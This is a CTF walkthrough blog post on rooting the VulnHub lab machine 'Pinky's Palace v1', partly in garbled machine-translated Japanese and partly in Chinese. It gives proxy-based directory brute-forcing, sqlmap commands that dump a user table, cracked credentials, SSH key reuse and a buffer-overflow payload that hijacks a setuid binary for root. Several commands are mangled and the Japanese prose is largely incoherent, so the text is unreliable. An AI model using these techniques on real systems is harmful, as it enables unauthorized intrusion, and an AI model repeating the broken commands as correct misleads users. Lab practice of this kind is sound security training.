**
VulnHub-ピンキーの宮殿:V1-チュートリアル
**
ドローンアドレスします。https://www.vulnhub.com/entry/pinkys-palace-v1,225/
ドローン難易度:中級(CTF)
ドローン発売日:2018年3月6日
ドローンの説明:ボックスの情報:唯一のDHCPおよびホストブリッジアダプタタイプはVirtualBoxの上でテストされた使用。
シンプル/中級:ユーザー入手困難
根ざし難易度:簡単/中間
目標:rootアクセスを取得&flag.txt見つける
著者:太夫
時間:2020年1月22日を
注:これらのすべてのコンピュータでは、私は、VMwareを実行しているコンピュータを使用してダウンロードしました。私は、攻撃者のマシンCTFに対する解決策として、カーリーのLinuxを使用します。ここだけの教育目的のために学習するための技術の使用は、技術は他の目的のためにリストされている場合、私は責任を負いかねます。
まず、情報収集
私たちは、VMのIPアドレスに標的を同定する必要がある、使用のnmapのは、宛先IPアドレスを取得するために:
私たちは、CTFのターゲットコンピュータのIPアドレスを見つけた:192.168.56.127
オープン8080,31337および64666ポートを削除するnmapのを...
アクセス8080、リターンいずれかのWAF(Webアプリケーションファイアウォール)が遮断され、いずれかの完全サーバー構成へのアクセスを拒否...:403エラー...そのような場合には、通常、2つの説明されている
ので... WAFがブロックされている場合、いくつかは、現在の環境のためにすることはできませんサーバーへのアクセスを拒否しなければならない...
Webサーバープロキシ... 31337 ...使用のアクセスにHTTPプロキシバイパスに推定されている
カール--proxy http://192.168.56.127:31337 127.0.0.1:8080:コマンドを
理由127.0.0.1ここで使用されますプロキシ経由でHTTPリクエストを渡すとき、上記を確認するために、プロキシサーバのローカルホスト(192.168.56.127)ではなく、私たちのコンピューターに127.0.0.1ポインティングは... ...アクセスにプロキシを使用することができます
ブラウザのプロキシ31337を修正するためにここに...
その後、ローカルIPポート8080は、ページにアクセスすることが表示されます...が、有効な情報がありません...
ここかgobusterはDIRBを使用することができます ブラストディレクトリに...
コマンド:gobuster -p http://192.168.56.127:31337 -u http://127.0.0.1:8080 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
FOUND / littlesecrets-メインカタログ...
間違ったパスワード...ユーザインタフェースにジャンプにログオンするために、デフォルトの管理者アカウントのパスワードを試してみてください...
logs.php ...アクセス
プレゼンスSQLインジェクションを、直接SQLMAP ...スイープ
コマンド:SQLMAP --url http://127.0.0.1:8080/littlesecrets-main/login.php --level = 3 --proxyのhttp:/ /192.168.56.127:31337 --data =「ユーザー=管理者&合格=管理者が」--dump
ユーザーエージェントが実際に再使用することができます見つける、私は、これは、DB内のテーブルのリストを生成し、SQLMAPを設定し...
コマンド:SQLMAP -uます。http: //127.0.0.1:8080/littlesecrets-main/login.php --proxy =のhttp://192.168.56.127:31337 --data = "ユーザー=ユーザー&パス=パス&提出=ログイン" --level = 5 --risk = 3 --dbms = mysqlの--tables
コマンド:SQLMAP -u http://127.0.0.1:8080/littlesecrets-main/login.php --proxy =のhttp: //192.168.56.127:31337 --data =「ユーザーユーザー&パス=合格=&=ログインを提出してください「--level --risk = 5 = 3 = --dbmsのMySQL --dumpユーザーが
pinkymanage:d60dffed7cc0d87e1f4a11aa06ca73af
pinkymanage、3pinkysaf33pinkysaf3
ログイン...
... sudoを許可していない
今のユーザーのリストを持っている...注ユーザ情報小指その...
ユーザーの...小指の存在を決定するために...ディレクトリを表示し
、ユーザのホームディレクトリは、コンテンツは、カタログの多くを制限する...私は...ウェブディレクトリに見て、ここでRSA鍵の所有を意味し、ファイルnote.txt見つけたものではありません...に行って見て...
鍵の発見は、RSA鍵は、ローカル側のコンテンツは...あなたにログインしようとすることです先に説明した後
、サインインすることはできませんテキストにデコードBASE64をしようとします...
第二に、言及する権利
首尾よく...ログイン
で...パスワードがないので、root権限でバイナリファイルを表示するには、こちらをadminhelperする...権利を言及するsudoを使用することはできませんビューを
同じ時間とシェルはここで次の試行を挿入することができるかどうかのsetuid root権限...(ELF)を持っている...
それは応答しなかった開始...後に、私はちょうどバッファオーバーフロー...入力値を有すると疑われる...私は見しようと答えた... pythonの入力
コマンドを./ adminhelper $(のpython -c「印刷『』 * 100」)
セグメンテーションフォールトを促し確認しました...ここでは、バッファオーバーフローの問題...スタックオーバーフロー値を見つける必要があります...
触发段错误找到了段错误的边界为72…
启动gdb来检查程序…发现spawn函数(这边可以利用spanwn函数进行提权)
我运行了spawn函数…现在我要触发堆栈溢出以重定向程序执行,来覆盖EIP中的返回地址…
命令:gdb --args ./adminhelper $(python -c “print ‘A’*72+‘B’*6”)
这边发现了42,它是“ B”的十六进制值…现在需要重定向执行得想计算出内存地址…
看到目标内存地址是0x00005555555547d0,创建外壳需要注入了5555555547d0,以避免在shellcode中有空字节…在shellcode中,字节顺序相反,因为该体系结构为低端字节序…所以:(\xd0\x47\x55\x55\x55\x55)
很好理解…
命令:./adminhelper $(python -c “print ‘A’*72+’\xd0\x47\x55\x55\x55\x55’”)
这边利用缓冲区溢出的栈溢出执着了外壳成功…
成功利用shell获取了root权限…由于此靶机都安装了python等工具能直接利用在内部对二进制漏洞制作shell,才顺利的拿到了root和查看到了flag…
加油!!!!
由于我们已经成功得到root权限&找到flag.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
